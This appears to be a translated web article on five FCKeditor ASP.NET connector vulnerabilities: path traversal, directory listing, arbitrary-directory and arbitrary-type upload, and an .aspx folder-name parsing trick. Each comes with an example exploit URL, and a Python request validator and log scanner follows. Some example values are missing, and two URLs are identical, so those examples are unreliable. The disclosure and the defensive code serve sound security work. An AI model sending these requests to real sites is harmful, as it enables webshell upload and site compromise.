SoFunction
Updated on 2025-04-07

Some program vulnerabilities in FCKeditor News Component

1 The CurrentFolder parameter is not confined to the upload directory: by tampering with it using ../../ sequences, new folders can be created in other directories of the website.
/browser/default/connectors/aspx/?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=


2 The CurrentFolder parameter also controls which directory is listed in the returned XML. By supplying values such as "../../../" to enter other directories, all directories of the website can be viewed, so the XML response exposes content the requester has no permission to browse.
browser/default/connectors/aspx/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3 When uploading a file, you can upload the file to a different directory by modifying the CurrentFolder parameter.
/browser/default/connectors/aspx/?Command=FileUpload&Type=Image&CurrentFolder=%2F

4 By modifying the Type and CurrentFolder parameters at the same time, any type of file can be uploaded to any directory of the website, at which point the website is effectively compromised.
/browser/default/connectors/aspx/?Command=FileUpload&Type=Image&CurrentFolder=%2F

/upload/fckroots/Image//



5 Using the create-folder function, create a folder whose name ends in .aspx, such as: etc., to take advantage of the file parsing vulnerability. Then upload files such as .jpg or .rar that contain code (the content is actually .aspx, and only the file name suffix differs) into that folder. After uploading, the vulnerability can be used to execute the code. For example: /upload// after input, the code is successfully executed.
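The five issues above share one root cause: the connector trusts Type, CurrentFolder and NewFolderName as sent by the client. The following is an added example, not FCKeditor's own code, showing in Python the server-side checks that reject each case; the same function can be run over web server logs to flag such requests. The allowed type list, the function names and the sample requests are assumptions made for the illustration.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Assumptions for this sketch: the permitted resource types and the upload root
# (the root matches the /upload/fckroots/ path shown on the page).
ALLOWED_TYPES = {"File", "Image", "Flash", "Media"}
UPLOAD_ROOT = "/upload/fckroots"

def check_connector_request(url):
    """Return the reasons a connector request should be rejected (empty = clean)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    rtype = qs.get("Type", [""])[0]
    folder = qs.get("CurrentFolder", ["/"])[0]
    new_name = qs.get("NewFolderName", [""])[0]
    findings = []

    # Items 3 and 4: Type must come from a fixed allowlist.
    if rtype not in ALLOWED_TYPES:
        findings.append("type-not-allowed")

    # Items 1 to 3: decode once more (double encoding), unify separators, then
    # resolve the folder and require that it stays under the per-type root.
    decoded = unquote(folder).replace("\\", "/")
    type_dir = rtype if rtype in ALLOWED_TYPES else ""
    base = posixpath.normpath(posixpath.join(UPLOAD_ROOT, type_dir))
    resolved = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if resolved != base and not resolved.startswith(base + "/"):
        findings.append("folder-escapes-root")

    # Item 5: folder names that carry an extension (any dot) are refused.
    names = [s for s in decoded.split("/") if s not in ("", ".", "..")]
    if new_name:
        names.append(new_name)
    if any("." in s for s in names):
        findings.append("dotted-folder-name")
    return findings

def scan(urls):
    """Map each flagged URL to its findings; clean requests are omitted."""
    return {u: f for u in urls if (f := check_connector_request(u))}

# Constructed sample requests; the first two reuse query strings from the page.
CONNECTOR = "/browser/default/connectors/aspx/"
SAMPLES = [
    CONNECTOR + "?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=",
    CONNECTOR + "?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F",
    CONNECTOR + "?Command=FileUpload&Type=Other&CurrentFolder=%2F",
    CONNECTOR + "?Command=CreateFolder&Type=Image&CurrentFolder=%2F&NewFolderName=x.aspx",
]
```

In the connector itself the checks belong before any file system call, and the resolved path, not the raw parameter, is what should be passed on.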